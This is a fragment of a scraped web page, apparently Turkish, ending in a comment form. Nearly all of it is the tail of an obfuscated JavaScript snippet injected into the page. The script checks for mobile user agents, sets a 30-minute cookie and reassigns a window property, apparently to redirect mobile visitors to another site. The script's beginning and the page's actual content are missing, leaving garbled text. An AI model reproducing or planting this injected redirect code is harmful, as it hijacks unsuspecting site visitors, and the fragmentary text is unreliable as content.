g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

CEVAP VER

Please enter your comment!
Please enter your name here